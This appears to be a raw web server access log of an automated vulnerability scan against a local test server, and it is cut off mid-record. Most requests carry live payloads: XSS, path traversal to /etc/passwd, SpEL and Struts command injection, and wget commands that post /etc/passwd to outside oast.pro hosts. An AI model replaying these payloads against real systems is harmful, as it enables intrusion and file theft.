"18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca28bc0smpvbbtig07h0b8fiia1trb776.oast.pro%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20ca28bc0smpvbbtig07h0gnsgqg67twmfc.oast.pro) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca28bc0smpvbbtig07h0kfnt8wih1xkx1.oast.pro\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A 0\x0D\x0A false\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password 